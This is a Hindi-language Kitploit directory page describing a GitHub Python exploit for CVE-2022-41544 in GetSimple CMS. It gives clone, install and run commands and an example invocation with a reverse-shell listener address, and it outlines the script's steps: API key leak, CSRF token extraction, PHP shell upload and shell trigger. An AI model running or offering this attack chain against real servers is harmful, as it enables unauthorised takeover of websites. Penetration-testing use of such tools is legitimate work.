Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-41544 — GetSimple CMS में CVE-2022-41544 के लिए Python exploit स्क्रिप्ट। पेनिट्रेशन टेस्टिंग के लिए API key लीकेज, CSRF टोकन निष्कर्षण, PHP शेल अपलोड, और रिवर्स शेल ट्रिगर को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

GetSimple CMS में CVE-2022-41544 के लिए Python exploit स्क्रिप्ट। पेनिट्रेशन टेस्टिंग के लिए API key लीकेज, CSRF टोकन निष्कर्षण, PHP शेल अपलोड, और रिवर्स शेल ट्रिगर को स्वचालित करता है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-41544 एक्सप्लॉइट स्क्रिप्ट

यह रिपॉजिटरी GetSimple CMS में CVE-2022-41544 भेद्यता का शोषण करने के लिए एक स्क्रिप्ट प्रदान करती है। स्क्रिप्ट भेद्यताओं की जाँच करने, API कुंजियाँ लीक करने, कुकीज़ सेट करने, CSRF टोकन प्राप्त करने, एक शेल अपलोड करने और शेल को ट्रिगर करने के लिए कई चरणों का प्रदर्शन करती है।

परिवर्तन और सुधार

  1. डेप्रिकेशन चेतावनी प्रबंधन: स्क्रिप्ट की कार्यक्षमता के लिए अनावश्यक telnetlib आयात को हटा दिया गया।
  2. उन्नत त्रुटि प्रबंधन: HTTP अनुरोधों और XML पार्सिंग के लिए अधिक मजबूत त्रुटि प्रबंधन जोड़ा गया।
  3. बेहतर उपयोगकर्ता प्रतिक्रिया: प्रत्येक चरण के लिए विस्तृत प्रतिक्रिया प्रदान की गई ताकि उपयोगकर्ता स्क्रिप्ट की प्रगति और किसी भी समस्या को समझ सकें।
  4. इनपुट सत्यापन: सुनिश्चित किया गया कि लक्ष्य, पथ और क्रेडेंशियल्स के लिए उपयोगकर्ता इनपुट मान्य हैं।
  5. दस्तावेज़ीकरण और टिप्पणियाँ: कोड पठनीयता और उपयोगिता में सुधार के लिए टिप्पणियाँ और दस्तावेज़ीकरण जोड़ा गया।

उपयोग

  1. रिपॉजिटरी को क्लोन करें:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. निर्भरताएँ स्थापित करें: सुनिश्चित करें कि आपके पास Python 3 स्थापित है और requests लाइब्रेरी भी है।

root@kitploit:~
pip3 install requests
  • स्क्रिप्ट चलाएँ:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: लक्ष्य डोमेन या IP पता।
    • <path>: GetSimple CMS इंस्टॉलेशन का पथ।
    • <ip:port>: रिवर्स शेल के लिए IP और पोर्ट।
    • <username>: GetSimple CMS के लिए व्यवस्थापक उपयोगकर्ता नाम।

    उदाहरण:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    
  • image

    image

    स्क्रिप्ट अवलोकन

    कार्य (Functions)

    • print_the_banner(): ASCII कला का उपयोग करके एक स्टाइलाइज़्ड बैनर प्रदर्शित करता है।
    • get_version(target, path): जाँचता है कि क्या GetSimple CMS का लक्ष्य संस्करण भेद्य है।
    • api_leak(target, path): एक प्राधिकरण XML फ़ाइल से API कुंजी पुनर्प्राप्त करने का प्रयास करता है।
    • set_cookies(username, version, apikey): प्राप्त API कुंजी के आधार पर आगे के अनुरोधों के लिए आवश्यक कुकीज़ सेट करता है।
    • get_csrf_token(target, path, headers): शेल अपलोड करने के लिए आवश्यक CSRF टोकन निकालता है।
    • upload_shell(target, path, headers, nonce, shell_content): लक्ष्य सर्वर पर एक PHP शेल अपलोड करता है।
    • shell_trigger(target, path): अपलोड किए गए शेल को ट्रिगर करके एक रिवर्स शेल कनेक्शन स्थापित करता है।

    मुख्य कार्य (Main Function)

    main() फ़ंक्शन CVE-2022-41544 भेद्यता का शोषण करने के लिए उपरोक्त फ़ंक्शनों को क्रम में बुलाकर पूरी प्रक्रिया का संचालन करता है।

    लेखक

    यह स्क्रिप्ट h3x0v3rl0rd द्वारा विकसित की गई है।

    अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है। इस स्क्रिप्ट का जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर उपयोग करें जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।

    लाइसेंस

    यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

    टूल डाउनलोड करें